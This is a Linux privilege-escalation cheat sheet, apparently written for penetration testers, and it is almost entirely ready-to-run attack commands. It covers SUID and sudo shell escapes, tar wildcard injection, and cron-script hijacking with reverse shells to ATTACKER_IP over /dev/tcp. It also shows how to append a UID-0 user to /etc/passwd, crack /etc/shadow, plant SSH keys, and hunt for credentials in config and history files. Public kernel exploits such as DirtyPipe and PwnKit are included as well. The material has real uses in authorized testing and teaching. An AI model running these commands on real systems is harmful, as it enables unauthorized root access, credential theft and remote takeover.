Linux Privilege Escalation
Linux privilege escalation exploits misconfigurations, SUID binaries, sudo permissions, cron jobs, and kernel vulnerabilities to gain root access from a standard user account.
Warning
Always ensure you have proper authorization. Kernel exploits can crash systems — use them with caution and document all attempts.
Initial Enumeration
System Information
bash
# Current user and groups
id
whoami
groups
# System information
uname -a
cat /etc/os-release
cat /etc/issue
hostname
# Environment variables
env
echo $PATH
Network Information
bash
# Network configuration
ip a
ifconfig
cat /etc/hosts
cat /etc/resolv.conf
# Connections and listeners
netstat -tulpn
ss -tulpn
# Routing
route -n
ip route
Automated Enumeration Tools
LinPEAS
bash
# Download and run
# NOTE(review): this pipes a remote script straight into sh, so whatever the
# URL serves executes before anyone has read it; the download-then-execute
# form below lets you inspect the file (and compare it with the published
# release) before running it.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or transfer and execute (the file is on disk, so it can be reviewed first)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Run specific checks
./linpeas.sh -s # Superfast (no network/docker checks)
./linpeas.sh -P # Password checks
LinEnum
bash
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -t
Linux Exploit Suggester
bash
# LES - Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
# LES2 - More exploits
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl
pspy - Process Monitor
bash
# Monitor processes without root (catches cron jobs)
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64
./pspy64
SUID/SGID Exploitation
Find SUID/SGID Binaries
bash
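# Find SUID binaries (2>/dev/null drops the permission-denied noise from
# directories the current user cannot read)
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries
find / -perm -g=s -type f 2>/dev/null
# Find both — the -o alternatives must be grouped: without \( \) find parses
# the expression as "-perm -4000 OR (-perm -2000 AND -type f)", so the
# -type f test never applies to the SUID branch
find / \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null
GTFOBins Exploitation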
Information
Check GTFOBins for SUID exploitation techniques for specific binaries.
bash
# Common exploitable SUID binaries
# bash (SUID)
/bin/bash -p
# find
find . -exec /bin/sh -p \; -quit
# vim
vim -c ':!/bin/sh'
# nmap (older versions)
nmap --interactive
!sh
# python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# perl
perl -e 'exec "/bin/sh";'
# cp (copy /etc/passwd, modify, copy back)
cp /etc/passwd /tmp/passwd
# Add root user: echo 'hacker:$(openssl passwd password):0:0::/root:/bin/bash' >> /tmp/passwd
cp /tmp/passwd /etc/passwd
Sudo Exploitation
Check Sudo Permissions
bash
# List sudo permissions
sudo -l
# Check sudo version (for CVE exploits)
sudo --version
GTFOBins Sudo Exploitation
bash
# If sudo -l shows NOPASSWD for specific commands:
# vim
sudo vim -c ':!/bin/bash'
# find
sudo find /etc -exec /bin/bash \;
# awk
sudo awk 'BEGIN {system("/bin/bash")}'
# less/more
sudo less /etc/passwd
!/bin/bash
# man
sudo man man
!/bin/bash
# env
sudo env /bin/bash
# ftp
sudo ftp
!/bin/bash
# nmap
sudo nmap --interactive
!sh
Sudo Wildcards Exploitation
bash
# If sudo allows: /bin/tar *
# Create files named as flags
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" > shell.sh
sudo /bin/tar cf archive.tar *
# If sudo allows: /bin/rsync *
echo "" > "-e sh shell.sh"
sudo /bin/rsync -e sh shell.sh localhost:/tmp
CVE-2021-3156 (Baron Samedit)
bash
# Check if vulnerable (sudo < 1.9.5p2)
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# Exploit
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich
Capabilities
Find Binaries with Capabilities
bash
getcap -r / 2>/dev/null
Exploit Capabilities
bash
# cap_setuid+ep (e.g., python)
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_dac_read_search (read any file)
# e.g., tar with cap_dac_read_search
tar -cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
# cap_net_bind_service (bind to privileged ports < 1024)
# Useful for phishing attacks or MitM
Cron Jobs
Enumerate Cron Jobs
bash
# System crontabs
cat /etc/crontab
cat /etc/cron.d/*
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.monthly/
# User crontabs
crontab -l
cat /var/spool/cron/crontabs/*
# Use pspy to monitor
./pspy64
Cron Exploitation
bash
# If cron runs writable script as root
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /path/to/script.sh
# If cron runs script from writable directory
echo '#!/bin/bash' > /writable/path/script.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /writable/path/script.sh
# Wait for cron, then: /tmp/bash -p
# PATH hijacking (if cron doesn't use absolute paths)
echo '#!/bin/bash' > /tmp/command_name
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /tmp/command_name
chmod +x /tmp/command_name
export PATH=/tmp:$PATH
Writable Files & Directories
/etc/passwd
bash
# Check if writable
ls -la /etc/passwd
# If writable, add root user
# Generate password hash
openssl passwd -1 -salt hacker password
# Add user with root privileges (UID 0)
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
# Login as new root user
su hacker
/etc/shadow
bash
# If readable, crack hashes
cat /etc/shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
hashcat -m 1800 -a 0 shadow.txt rockyou.txt
# If writable, replace root hash
# Generate: openssl passwd -6 password
vim /etc/shadow
SSH Keys
bash
# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
cat /home/*/.ssh/id_rsa
# If authorized_keys is writable
# On attacker: ssh-keygen -t rsa
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
ssh -i id_rsa root@target
Kernel Exploits
Danger
Kernel exploits can crash systems. Always have backup access and test in a lab first. Use them only as a last resort.
bash
# Check kernel version
uname -a
uname -r
# Use linux-exploit-suggester
./linux-exploit-suggester.sh
DirtyPipe (CVE-2022-0847)
bash
# Linux kernel 5.8 - 5.16.11
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
bash compile.sh
./exploit-1 # Overwrites /etc/passwd
DirtyCOW (CVE-2016-5195)
bash
# Linux kernel 2.6.22 - 4.8.3
wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password
# Creates firefart user with root privileges
PwnKit (CVE-2021-4034)
bash
# Polkit pkexec - affects most Linux distros
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
make
./cve-2021-4034
Credential Hunting
bash
# Search for passwords
grep -r "password" /etc/ 2>/dev/null
grep -r "password" /home/ 2>/dev/null
grep -r "pass" /var/www/ 2>/dev/null
# History files
cat ~/.bash_history
cat ~/.zsh_history
# Config files
cat /etc/mysql/my.cnf
cat /var/www/html/config.php
cat /var/www/html/.env
# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null
# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null